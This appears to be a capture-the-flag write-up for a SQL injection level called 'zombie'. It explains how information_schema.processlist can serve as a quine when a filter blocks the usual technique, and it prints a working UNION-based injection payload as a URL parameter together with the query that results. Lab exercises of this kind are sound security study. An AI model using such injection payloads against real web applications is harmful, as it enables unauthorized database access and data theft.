zombie
We are provided with the SQL query:
SELECT pw FROM prob_zombie WHERE pw='{$_GET[pw]}'
Similar to [ouroboros], in this challenge, we have to use a Quine in order to solve it.
However, since ace
is being filtered out, we have to find another way of crafting our Quine.
information_schema.processlist
table
As noted by this documentation, in MySQL, the information_schema.processlist
is one source of process information which indicates the operations currently being performed by the set of threads executing within the server.
info
column
Within this table, the info
column contains the statement that is being executed as show below.
SELECT info FROM information_schema.processlist
Since the above query is being executed, the value present in the info
column of information_schema.processlist
would be:
+-------------------------------------------------+
| info |
+-------------------------------------------------+
| SELECT info FROM information_schema.processlist |
+-------------------------------------------------+
As we can see, the SQL query outputs itself, thus acting as a Quine.
Modified Quine
1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23
substr(info,locate('1',info),length(info)-locate('1',info))
:locate('1', info)
finds the position of the first occurrence of the character'1'
in theinfo
column.length(info)
gives the total length of theinfo
column's content.length(info)-locate('1',info)
calculates the length of the substring starting from the first occurrence of'1'
to the end of theinfo
content.substr(info, locate('1', info), length(info) - locate('1', info))
extracts this substring.
from information_schema.processlist
:- This specifies the table from which the data is being selected. The
information_schema.processlist
table contains information about the currently running processes in the MySQL database server.
- This specifies the table from which the data is being selected. The
If we provide the following URI parameter:
?pw=1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23
The resultant query becomes:
SELECT pw FROM prob_zombie WHERE pw='1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist #'